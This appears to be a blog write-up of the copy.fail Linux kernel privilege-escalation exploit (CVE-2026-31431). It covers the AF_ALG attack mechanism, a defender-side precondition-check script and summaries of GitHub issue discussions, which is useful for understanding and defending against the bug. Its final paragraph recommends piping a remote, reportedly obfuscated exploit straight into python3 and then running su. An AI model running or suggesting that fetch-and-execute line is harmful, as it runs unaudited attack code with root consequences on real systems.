copy-fail CVE-2026-31431: Linux Kernel Privilege Escalation via AF_ALG Socket Attack
A critical Linux kernel vulnerability—tracked as CVE-2026-31431 and dubbed "copy.fail"—has been weaponized into a proof-of-concept exploit that achieves local privilege escalation (LPE) via a cleverly crafted AF_ALG socket attack. Published by theori-io on April 29, 2026, the exploit targets a flaw in the Linux kernel's copy_file_range() system call when used with the AF_ALG interface, allowing an unprivileged user to gain root access on affected systems. The vulnerability has been confirmed to affect multiple major Linux distributions including Debian, Ubuntu, Arch Linux, Alpine, Proxmox VE, and NixOS under specific conditions.
- AF_ALG Socket Exploitation: The exploit leverages the kernel's AF_ALG netlink interface, binding to the algif_aead kernel module with a deliberately malformed socket configuration. By setting bind() and setsockopt() calls with crafted parameters, the kernel's internal state becomes corrupted, enabling a controlled sendmsg() call to trigger arbitrary code execution with root privileges.
- Zlib-Compressed Shellcode Payload: A minimal setuid-root shell payload is embedded as a zlib-compressed binary within the Python exploit, keeping the payload compact and somewhat obfuscated. When executed, it simply calls setuid(0) and spawns a root shell, demonstrating the privilege escalation.
- Distribution-Agnostic Impact: Unlike many kernel exploits that require specific configurations, copy.fail works across a wide range of Linux distributions—provided the su binary is accessible at /usr/bin/su and the algif_aead kernel module is loaded. It has been tested successfully on kernel versions from 6.12 to 6.18 across Arch Linux, Debian, Ubuntu, Alpine, Proxmox VE, and NixOS.
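A defender-side precondition check, added here as an example; it is not code from the copy.fail repository or from theori-io. It tests the two conditions the bullets above name for the public PoC, a kernel in the 6.12 to 6.18 range and a loaded algif_aead module, and in live mode also reports whether /usr/bin/su exists. The function names, the output labels and the constructed /proc/modules sample are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the copy.fail repository). Checks the preconditions
# the write-up lists for the public PoC: kernel 6.12..6.18 and algif_aead
# loaded. Inputs are passed as arguments so the logic can be exercised on
# constructed data; pass --live to read the running host instead.

# kernel_in_range VERSION -> "yes" if major.minor lies in 6.12..6.18, else "no"
kernel_in_range() {
    major=$(printf '%s' "$1" | cut -d. -f1 | sed 's/[^0-9].*//')
    minor=$(printf '%s' "$1" | cut -d. -f2 | sed 's/[^0-9].*//')
    [ -n "$major" ] || major=0
    [ -n "$minor" ] || minor=0
    if [ "$major" -eq 6 ] && [ "$minor" -ge 12 ] && [ "$minor" -le 18 ]; then
        echo yes
    else
        echo no
    fi
}

# module_loaded NAME MODULES_TEXT -> "yes" if NAME is the first field of any
# line of MODULES_TEXT (the /proc/modules layout), else "no"
module_loaded() {
    printf '%s\n' "$2" | awk -v m="$1" '$1 == m { found = 1 } END { print (found ? "yes" : "no") }'
}

# assess VERSION MODULES_TEXT -> a label naming the first precondition that fails,
# or "precondition-met" when both hold
assess() {
    if [ "$(kernel_in_range "$1")" != yes ]; then
        echo kernel-outside-tested-range
    elif [ "$(module_loaded algif_aead "$2")" != yes ]; then
        echo module-not-loaded
    else
        echo precondition-met
    fi
}

# Constructed sample of /proc/modules output (sizes and addresses are made up)
SAMPLE_MODULES='algif_aead 16384 0 - Live 0xffffffffc0a00000
af_alg 32768 1 algif_aead, Live 0xffffffffc09f0000
ext4 1048576 1 - Live 0xffffffffc0800000'

if [ "${1:-}" = "--live" ]; then
    kver=$(uname -r)
    mods=""
    [ -r /proc/modules ] && mods=$(cat /proc/modules)
    echo "kernel $kver: $(assess "$kver" "$mods")"
    # The PoC also expects su at /usr/bin/su (the reason it fails on NixOS).
    if [ -x /usr/bin/su ]; then echo "/usr/bin/su present"; else echo "/usr/bin/su absent"; fi
else
    echo "sample: $(assess 6.15.3-arch1 "$SAMPLE_MODULES")"   # precondition-met
fi
```

Run it with `--live` to read `uname -r` and `/proc/modules` on the host. A `module-not-loaded` or `kernel-outside-tested-range` result only means the public exploit's precondition is absent; it does not show that the kernel bug itself is fixed, which is the same point the NixOS issue makes about a failing PoC run.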
Issue #48 — "NixOS 25.11 maybe affected?" (30 comments)
Users on NixOS initially reported that the exploit wouldn't run, but maintainer @zimward clarified that the exploit simply fails because the su binary is not at the expected path: "what you are seeing doesn't actually mean its not affected. The exploit just isn't working because the su binary isn't placed in /usr/bin." User @Tuco106 shared a workaround using envfs to expose binaries at standard paths, but noted the exploit still failed. The broader conclusion: since this is a kernel bug, NixOS likely is affected if algif_aead is loaded—even if the current exploit can't demonstrate it due to path differences.
Issue #17 — "Tested with Talos v1.12.5, k8s v1.36.2" (19 comments)
A Kubernetes cluster security discussion emerged when user @aJuvan reported the exploit worked inside a Talos Linux container. @rothgar questioned the significance: "Does not work after upgrade to Talos v1.13.0, k8s v1.36.0" and asked how this matters when you already need a privileged container to test it. @aJuvan clarified that the real concern is in environments where many users have container access without root on the container itself—where this exploit could break that isolation boundary.
Issue #54 — "Please deobfuscate the Python" (16 comments)
Security-minded contributors pushed back on the intentionally obfuscated Python code. @erlenmayr requested readable variable names and transparent code: "I fear that the script itself contains a virus unless I can read and understand it." User @7own verified the zlib payload by disassembling it, confirming it simply calls setuid(0) and spawns /bin/sh. The discussion highlights a broader tension in the security community between responsible disclosure and reproducible, auditable exploit code.
copy-fail CVE-2026-31431 is a textbook example of how a seemingly innocuous kernel interface (AF_ALG) can be weaponized for privilege escalation. With over 2,800 GitHub stars in just a few days and active contributions from security researchers across NixOS, Talos, Proxmox, and mainstream distros, this project is a critical resource for understanding kernel attack surfaces. If you run any Linux system, test whether you're affected with the one-liner curl https://copy.fail/exp | python3 && su—and patch immediately if you are.
🔗 @theori-io / copy-fail-CVE-2026-31431